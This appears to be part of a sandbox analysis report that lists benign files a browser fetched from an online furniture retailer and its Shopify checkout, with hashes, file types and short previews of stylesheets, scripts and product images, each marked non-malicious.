                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:if(!customElements.get("toast-notification")){class ToastNotification extends HTMLElement{constructor(){super(),this.init()}getCookie(name){const parts=`; ${document.cookie}`.split(`; ${name}=`);return parts.length===2?parts.pop().split(";").shift():null}setCookie(name,value){document.cookie=`${name}=${value};path=/`}getDiscountFromCookies(){const discountCode=this.getCookie("discount_code");let dismissedToasts=this.getCookie("dismissed_toasts");return dismissedToasts=dismissedToasts?JSON.parse(dismissedToasts):[],!discountCode||dismissedToasts.includes(discountCode)?!1:(dismissedToasts.push(discountCode),this.setCookie("dismissed_toasts",JSON.stringify(dismissedToasts)),discountCode)}checkDiscount(cart,code){return this.checkCartDiscount(cart,code)?this.checkCartDiscount(cart,code):this.checkProductDiscount(cart,code)?this.checkProductDiscount(cart,code):!1}checkCartDiscount(cart,code){return cart.cart_level_discount_applications.some(discount=>discount.title===code)}checkProductDisco
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):41062
                                                                                                                                                          Entropy (8bit):7.972436807907103
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:11AEE8F68D84BFA4B583067162E2682A
                                                                                                                                                          SHA1:146EE7700ADD0EC9CDE9626ABBEA05AF3CB91F45
                                                                                                                                                          SHA-256:349A41B685852B87DA17F68FD08333563D96AA4A1B00E9AED96717EA6BC7AE86
                                                                                                                                                          SHA-512:0F345FCD0A2C77F30293D8AE39C05868EFE20AFED9258F8EE55F8687A2B70424994077C40EFEA3BA6CB59FFE3864E35C8E54FF19904E3907E67172291E2CFA87
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................9..JcN......f6....H..*_...n+.P....f...:..Zij...8}.'.U....3$.m...>[...].&.I.....e......o....!.....W...H...Q..........5L..7..U....-D.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):246
                                                                                                                                                          Entropy (8bit):4.744852095255021
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:1E05A81C6647B91CC227591AD7584653
                                                                                                                                                          SHA1:B3401479BE40B77BAA07526B9B721B297F1DD7F9
                                                                                                                                                          SHA-256:3A2580842B709E881EA6C57395AB78749A69F573998A35EA86175DB63755AC3A
                                                                                                                                                          SHA-512:9BC5BC59EA942DF584AD8CB2B04F681FEA36A2465266E8B2E2F242F0478E2E29335ABC5F95C1316F55993707EEE29A3CEA4160DAE4C427C09B08834CEFC1C51F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/PayButtonSection.DF7trkKf.css
                                                                                                                                                          Preview:.zdTmQ{position:relative;padding-bottom:env(safe-area-inset-bottom);margin:0;height:109px;overflow:hidden;border-top:1px solid var(--x-default-color-border);box-shadow:var(--x-box-shadow-small);background-color:var(--x-default-color-background)}.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (48596)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1672998
                                                                                                                                                          Entropy (8bit):5.475754929204754
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0F7FCD3398D88F87AB4B8B27B24584BB
                                                                                                                                                          SHA1:D9F3594536847868288E2014F3D1EA421495A5A9
                                                                                                                                                          SHA-256:20C05DEAC12E967D9935782C118AD5FE2F81C978D18665B6CD1636638E1C8532
                                                                                                                                                          SHA-512:A7D754D3780EF03F87A1F20B54351D3D02061F239383DE61593CB1E3DB9CEC0E20E3AA6B59E6DEF975D277772969DA7FAFF27B99579EA73002C802DF59EEAD3F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/app.CRtF78CU.js
                                                                                                                                                          Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["Assistant.DmU73aUK.js","assets/Assistant.PVhJuO-T.css","component-PhoneNumberFormatter.BWaYWA6e.js","getCountryCallingCode.CIAGUJN6.js","index.CYmXWMTL.js","actions.BtXoJZU6.js","graphql-utilities.CKy_kaJ-.js","CheckoutEditorBridge.BRhRXaCX.js","LegacyVaultedShippingMethods.8dZ3Q6PP.js","Rollup.B3ludNL-.js","assets/Rollup.o9Mx-fKL.css","SubscriptionPriceBreakdown.CcRBYBQn.js","assets/SubscriptionPriceBreakdown.Bqs0s4oM.css","component-ProfilePreviewBar.DKILt93V.js","assets/ProfilePreviewBar.CqJK7U9e.css","ActiveInspector.DcMRLHtO.js","assets/ActiveInspector.DvJo1XKD.css","component-AutocompleteField.C4yKM6g6.js","hooks.CY4n-DVx.js","assets/AutocompleteField.x0LibsMb.css","component-ShippingGroupsSummary.B1cyOGhQ.js","StackedMerchandisePreview.B7T1npCx.js","assets/StackedMerchandisePreview._xnAOXmq.css","useAmazonContact.WvHD3hTp.js","assets/useAmazonContact.D-Ox6Dnf.css","component-Throttle.CiXLRPyA.js","assets/Throttle.BA0bvilx
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):163
                                                                                                                                                          Entropy (8bit):5.335116588616875
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:B37ADEFE65A46E831684783E83EDAEF9
                                                                                                                                                          SHA1:CF24CBDE1D7CFE1773CE1F0131973DB90F72B0CA
                                                                                                                                                          SHA-256:E4038D5B0B549B4FE73AC5450618E0B45AC1251CE9980DF6BDCDB61A43BA6140
                                                                                                                                                          SHA-512:5A975DD2A54EB951930275876CDF35D1DB3237B312B6C52988BAB9897BBA2587585025BC42C6B1E79F52560A1D843913BB5F15E3DD6A6DE5B9CC7C4F4632F996
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */."use strict";(self.pwrClg=self.pwrClg||[]).push([[760],{52760:(s,l,r)=>{r.r(l)}}]);
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1730)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1838
                                                                                                                                                          Entropy (8bit):5.057824715061139
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F4DF03851E033E656A8DE3EA718C038B
                                                                                                                                                          SHA1:B5217E9BFB84DE42EC587505163247832794BE21
                                                                                                                                                          SHA-256:A5338B2B41CC8ACFB9C9D8E3148607C3FC2D4A0FAC7E60DCFA6F9B27815AF032
                                                                                                                                                          SHA-512:1EB45FF15047FDF0215344AAF830DF205EE095AD4981ED1271076A4C5CDDBDB025BFB99230C9EF16E18D2403C5D40136DA803F6A5F2BCD2527075F97680FE4B7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/component-scroller.css?v=172298930654121046611729142870
                                                                                                                                                          Preview:carousel-slider{position:relative;display:block}@media (min-width: 990px){carousel-slider:hover .pill-nav-slider-inline-nav{opacity:1;z-index:100}}@media (max-width: 989px){.scroller{overflow:hidden}}.scroller.scroller-desktop{overflow:hidden}.collection-block-subcollections .grid{display:flex;flex-wrap:wrap;padding:0;margin:0;list-style:none;column-gap:20px;row-gap:20px}@media (max-width: 989px){.scroller-inner{padding-bottom:20px;overflow-x:auto;overflow-y:hidden;scroll-snap-type:x mandatory}.scroller-inner .grid{flex-flow:row nowrap;padding:1px 1px 2px}}@media (max-width: 749px){.scroller-inner .grid .grid-item:not(:only-of-type){width:50%;max-width:50%}.collection-block-subcollections .grid .grid-item:not(:only-of-type){width:65%;max-width:65%}.collection-block-subcollections .scroller-inner{padding-bottom:0}.scroller-inner .collage{display:flex;flex-flow:row nowrap}.scroller-inner .collage .card-overlay:not(:only-of-type){width:85%;max-width:85%;flex:none;scroll-snap-align:center}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):163
                                                                                                                                                          Entropy (8bit):5.297552459436421
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:3FFE69064BB323E26EBDDE40AECB8628
                                                                                                                                                          SHA1:A5E4370DD1416A345A2F41148BE5B67893C96A7A
                                                                                                                                                          SHA-256:FF99032B0E0EC65E9A0B4800B2A497F77556908A10D1458CB2C2DC0D458C3F2A
                                                                                                                                                          SHA-512:61F521E411637D77D7EE56AFCB75DCC2716D65C0E2C14FA3AFE589C7CF94496B19D1587A8EF89A3F6C344978E74CF74FF3C6A8960E16D1A9065CD55864E152F1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */."use strict";(self.pwrClg=self.pwrClg||[]).push([[136],{60136:(s,l,r)=>{r.r(l)}}]);
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (18059)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18677
                                                                                                                                                          Entropy (8bit):5.6263663078333686
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:5C982ECAC0F4145E90078B29747D2B99
                                                                                                                                                          SHA1:DEE35CF6512EBB111DD575DC6E64EE0BF16F7F23
                                                                                                                                                          SHA-256:338A10E5D4801E90C33DF4911254821190287C19525438AD56AFB2F75CD78D63
                                                                                                                                                          SHA-512:361213EFE143E0BB598A9942611C1F89B9E40D643499925C1C0B6F88132E05618F6049CAFC2CD2191096C98ADFB644EF15391A70F7E92ED6E0D631578CA0CB24
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var n=function(J){return J},Y=this||self,e=function(J,z){if(J=(z=null,Y).trustedTypes,!J||!J.createPolicy)return z;try{z=J.createPolicy("bg",{createHTML:n,createScript:n,createScriptURL:n})}catch(a){Y.console&&Y.console.error(a.message)}return z};(0,eval)(function(J,z){return(z=e())&&J.eval(z.createScript("1"))===1?function(a){return z.createScript(a)}:function(a){return""+a}}(Y)(Array(Math.random()*7824|0).join("\n")+['(function(){/*',.'',.' Copyright Google LLC',.' SPDX-License-Identifier: Apache-2.0',.'*/',.'var k=function(J,z){if(J.R)return iX(J,J.N);return(z=S(J,8,true),z&128)&&(z^=128,J=S(J,2,true),z=(z<<2)+(J|0)),z},JO=function(J,z,n,e,w){for(J=(e=(w=0,J[2]|0),J)[3]|0;w<15;w++)n=n>>>8|n<<24,n+=z|0,n^=e+1573,z=z<<3|z>>>29,J=J>>>8|J<<24,J+=e|0,z^=n,J^=w+1573,e=e<<3|e>>>29,e^=J;return[z>>>24&255,z>>>16&255,z>>>8&255,z>>>0&255,n>>>24&255,n>>>16&255,n>>>8&255,n>>>0&255]},zi=function(
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):23130
                                                                                                                                                          Entropy (8bit):7.969764672688232
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:2D6E95A81B0F878A633B2D9ECD47867D
                                                                                                                                                          SHA1:A07F4C46AF6C9383FC831A6B415FBFD75E8EBB0A
                                                                                                                                                          SHA-256:56F78EA34488C403551FEE586435F571F538213D61BF1A522FAD3507802235B6
                                                                                                                                                          SHA-512:246601730F5EA9CFA888C89A3302ADF696F2259C4BFB84A5D96AA266296AC1C3A06CEA029D545918232FBC11D23A14849F8FF162C20856471F887C45C9B5E366
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/collections/Fickle-Cream-Boucle-2-Piece-Modular-RAF-Sofa.jpg?v=1710949913&width=320
                                                                                                                                                          Preview:RIFFRZ..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .W.......*@.@.>9..C.!....h ....i..=P4..#._.....8.g............^.?.=Y.`.K........Y..................P....}r=L...........7...?.+......l......=@?.kL......m.....?.......x.._2>...G.....?...............:.U.....Y...........}...........I...s.o..._..............?.?....................?.~....[..._...>....l...+...W....~^.x....~...<..R..v....bb..L.P.L.,....L5Se............'S._.n.d.SSW"V>c..:Gj.PK..!."...O~Hv...t.l..f.CH<.L=.."^bk0LRm...0.>n.......Y.K.F.AX..^.C5h.t.B.z[!...3w.._AB.......|_....<......:D...,Q2...|uzn.....l.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2497)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2599
                                                                                                                                                          Entropy (8bit):5.030209267959344
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6ECB348BE159E6578DB5275884E50D05
                                                                                                                                                          SHA1:C148630029E2970782BCFE4E6C844E87DF83AF38
                                                                                                                                                          SHA-256:0D856A381B1B17D0FE858FB174E12DE3C595C30FC636CBF1502190212B89A9DB
                                                                                                                                                          SHA-512:D619D18D7C4BC29FD72F31B4870910685530C6D35E1AFF6F338A5C63D16C5418D7FB5BE0FA5DFE81511C284DC2D5855B25E292C88584ECAE4A12CC9E55AE0A2B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/content-cards.css?v=65834774719010717701729142870
                                                                                                                                                          Preview:.content-cards-container{position:fixed;height:100vh;right:0;top:0;width:440px;max-width:100%;background-color:#fff;z-index:100;box-shadow:0 0 4px #00000029;transform:translate(100%);transition:.2s ease-in-out}.content-cards-container.show{transform:translate(0)}.drawer-open:after{content:"";background:#0003;position:fixed;width:100%;height:100%;z-index:55;top:0;left:0}.content-cards-header{display:flex;padding:10px 18px;box-shadow:0 1px 4px #00000029;justify-content:space-between;align-items:center}.cch--title{font-weight:700;font-size:18px;font-family:var(--font-body-family);color:#5a5a5a;justify-content:space-between}.cch-btn{background:transparent;border-radius:2px;border:1px solid #DBDCDF;height:100%;padding:8px;cursor:pointer}.head-slot-bell{cursor:pointer;position:relative}span#badge{position:absolute;top:9px;right:5px;background:#fff;width:22px;height:22px;padding:0 5px;display:flex;justify-content:center;align-items:center;transform:translate(25%,-40%);border-radius:50%;font-s
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):142
                                                                                                                                                          Entropy (8bit):4.592918443386731
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F8346FF4C935161534333DB34ACD1A3B
                                                                                                                                                          SHA1:D18213AFAC880F5E09E933019DAAC0C3002A5E38
                                                                                                                                                          SHA-256:5CE6A8B8DD8CD6628516995F2F5F822870E00AB6213C964DE8438AD86C3EA1C6
                                                                                                                                                          SHA-512:230758D45915F55647FFF6751743DFABC16EA38E63B99EB3269D0BC01D94404BDDBC539BC77BDC9099BC3CF2CFAFDAA1C6EA4F50F507B73E0C82709E74D22B91
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"40503080","rollup":{"average_rating":5.0,"rating_count":2,"review_count":2,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (5932)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6029
                                                                                                                                                          Entropy (8bit):4.980432963175152
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:67E3D6CF369E6A027F3EA8291D269DB5
                                                                                                                                                          SHA1:3541630BC65B74290FDEB186BF4F88BFBDCCC58C
                                                                                                                                                          SHA-256:51F6638A83A9F0D5E2EC85BD2C9D546109B7C5952FEF9F1082656CD015010A2A
                                                                                                                                                          SHA-512:B658204EF3E70D8496C59C31CBF56C40B0AA1A50FFA3C507CE454AC682F4EF6157BBFBC3C7EB3D846D8EA1B3A5FAEA9A2F851B22F9FC739647BE976FF7C8894A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/cart-drawer.js?v=166125276811576869981729142870
                                                                                                                                                          Preview:function loadScript(src){return new Promise((resolve,reject)=>{const s=document.createElement("script");s.src=src,s.onload=resolve,s.onerror=reject,document.body.appendChild(s)})}if(!customElements.get("cart-drawer-disclosure")){class CartDrawerDisclosure extends DetailsDisclosure{constructor(){super(),this.openBtn=this.querySelector("summary"),this.closeBtn=this.querySelector(".js-close"),this.overlay=document.getElementById("cart-drawer").querySelector(".overlay")}handleClick(evt){evt.target.matches(".js-close")&&this.close()}open(){this.overlay.classList.add("is-visible"),super.open(),trapFocus(this),this.clickHandler=this.clickHandler||this.handleClick.bind(this),this.keyupHandler=evt=>evt.key==="Escape"&&this.close(),this.addEventListener("click",this.clickHandler),this.addEventListener("keyup",this.keyupHandler),this.overlay.addEventListener("click",this.clickHandler)}close(){this.overlay.classList.remove("is-visible"),super.close(),removeTrapFocus(this.openBtn),this.removeEventL
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 650x366, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):57303
                                                                                                                                                          Entropy (8bit):7.957327858381428
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:E98B0B729C842E9E19B7E891501DF940
                                                                                                                                                          SHA1:C36A1924B0133AF31CE47F1E0A7E04EBE894CA1B
                                                                                                                                                          SHA-256:25FD400C8F64398ADAEB2EADC0BF9BDD5BBB14C675AEAC05B6597B9BCA5AE5F2
                                                                                                                                                          SHA-512:5A73780B8F980AF3A7D2E582B0C0915FED31F4989C5FAB34E045CFFD3F181EFD19DBF02E43AF85967353A8F42095D2947B330FBDD68F18A90F2109DC4BE86EE9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f........2.......2................0210....................0100................................n...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......n............................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4101
                                                                                                                                                          Entropy (8bit):4.691709396724558
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:ED611F8363C6F27C06038DA447218B1E
                                                                                                                                                          SHA1:0A43399464AA220CE260C40C52AEC7101316FC2B
                                                                                                                                                          SHA-256:C8A76032777547F015295A40D0F180058EE78F67D5EEA65684D8374AC3273147
                                                                                                                                                          SHA-512:0E6CCF3444E0C2B8056B9FDFF5A0E1DB0495E4625607A2347F6BD8B44C0EC73562492A8C066785DD77A4B41E6291D8280C1B2DEB496AD533E136FAB038AB42DE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:(function(w,d,c,k,a,b,t,e) {.. var cs = d.currentScript;.. if (cs) {.. var uo = cs.getAttribute('data-ueto');.. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {.. w[uo].setUserSignals({'co': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});.. }.. }..})(window, document, 'us', true, false, false, false, false);..(function(w,d,s,i) {.. var c=d.currentScript;.. if (c) {.. var uo = c.getAttribute('data-ueto');.. if (uo && w[uo] && w[uo].uetConfig && w[uo].uetConfig.deBlock === true).. return;.. }.. var f,j; f=d.getElementsByTagName(s)[0]; j=d.createElement(s); j.async=true;.. j.src='https://www.clarity.ms/tag/uet/'+i+'';.. j.onload = function () {.. if (!c) return;.. var co = function(u) { return u && typeof u === 'object' && !(u instanceof Array) && u.beaconParams && u.beaconParams.mid && w.clarity; };.. var r = 40;.. var cl = function() {.. if (r-- <
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1073)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1173
                                                                                                                                                          Entropy (8bit):5.010323316239004
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:25C234181BA5FDE85701E866DE738C93
                                                                                                                                                          SHA1:4214FA475BDA9957B5E10F7FF0472B69D54B03B4
                                                                                                                                                          SHA-256:47FC8C961E0E4AA0F4A1A3A4D4B482DE421E90F0E80298B6208A0EBA91A74335
                                                                                                                                                          SHA-512:8941D3F778016F777BFA7987812B71692042E8847640239EAB7D8A508B240C81FF6D246E6AB5B4FE7614BB895D7D407B2FB240A8EF25F97E1878B4F7AB00F24A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/promo-strip.css?v=97151819380307353391729142870
                                                                                                                                                          Preview:.newsletter-form-success{display:none}#newsletter-form-input-wrap{display:flex;background:#fff;padding:5px}.newsletter-form-input-wrap input,.newsletter-form-input-wrap input:focus,.newsletter-form-input-wrap input:hover,.newsletter-form-input-wrap button{border:unset}.newsletter-form-success{padding:5px}h5.newsletter-form-success-title.form-status-title{color:#fff;margin:auto}.promo-strip__discount .input-with-button{display:inline-flex}.promo-strip__discount,.promo-strip__button,.promo-strip__rte{margin-bottom:.8em}.promo-strip__heading{max-width:100%;margin-bottom:.2em}@media (max-width: 768.98px){.promo-strip__heading+.promo-strip__button{margin-top:.8em}.newsletter-form-input-wrap input{flex:1}}@media (min-width: 769px){.promo-strip__container{display:flex;row-gap:calc(4 * var(--space-unit))}.promo-strip__container .section__block{margin-bottom:0}.promo-strip__button{white-space:nowrap}}@media (min-width: 1024px){.promo-strip__container .rte{flex-shrink:0;max-width:100%}.promo-str
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35201
                                                                                                                                                          Entropy (8bit):7.96583812187826
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:5690299B98FCEDD8FCD2572E45BE3640
                                                                                                                                                          SHA1:F2C9310BCA32769CCCF47CBC25F790DAD78E716D
                                                                                                                                                          SHA-256:F921FFA8FB37448393E8DB833DFF9E267591F2906EDC3BD19B04198A2A0F8C72
                                                                                                                                                          SHA-512:33EE78BACC08E4C14CF66BB5E58C527842FFEBE23382E1BA4BE3EF40C61B27C0E4AEF8B0962168094587AC1665019A1EF921B18CC1D62B076A221EA06F5B4D3F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................Sh.O..n..L..}[mQ$.CMG.$."..6.:.....wjl-0...pp.f}22u.~.+V|..}*..u..zC.%.............T....%!.20.".!).kA..pppg.&...._....g..N........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7316
                                                                                                                                                          Entropy (8bit):7.848885356169799
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:38E322F51868BE098375A86FE5BD89E6
                                                                                                                                                          SHA1:E53C52FE349CF329F36B825BC4D5A61A827BFEE9
                                                                                                                                                          SHA-256:D982AC70FC3624C22046C0C92F89F7B526858DDDFE59E5037AC5C433F1FEF452
                                                                                                                                                          SHA-512:F83FEED1C1C6BB3D969E49ECA07082C12BAC7892F2BE4186FFDA7E7B8C43B74CEEBDCE77DF2845175A352347AF88560A6DAA2A68E1F5A89A52DCE293E6A0E43C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/POLYTRENDS-Laguna-Outdoor-Eco-Friendly-Poly-Folding-Adirondack-Chair-_28Set-of-2_29_ffd26b38-154e-4e5e-8348-880164789e6f.jpg?v=1728075182&width=320
                                                                                                                                                          Preview:RIFF....WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .....k...*@.@.>9..D"!..&.x.@..en.v...]F2......G....&.m...P..<..............I........./.o..p...p}B~.......;....r........#......^............%._..'....?._...|......k......R..y....?.z.e...}..........O......:.w........_....}s.W._......~Q.C.}.O.?S...k}...r.8@J...p......*..1..T4Nu..x..eC..k.R.z.|.0..c......~/.. %........p..y.g@z..k|..T3.6..tT.."WLd...C..-*...5(....M...eC..s.}.rx0....].H.z...j*G1Bt.+.U.^...2...OR.pF.v...mU..Z^9..hLl....h....9v..BF.w.^.a..K.[~.v..a..(..kQgY.....F'..Rq.......ZS.".RdEy..6`.t.$..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):545
                                                                                                                                                          Entropy (8bit):4.972811279040273
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:2BCF55B7A6BC310149E843449377B0CE
                                                                                                                                                          SHA1:743463645AA5ED1D244395EF248561FEB51B95AF
                                                                                                                                                          SHA-256:21AFF1C48B459F1853E033832ED9137558672180B4943F0822AFA9ADFE1B9DA8
                                                                                                                                                          SHA-512:6F148E4E80805B5FBA1460DCEF1EE420A7C09A594EC2B7EA1149A8A047FC12D3B8603D7C0ED5A1E7D9126CCBA4C4C7390E8F64492F14A271FFDB1FAB9D077D77
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
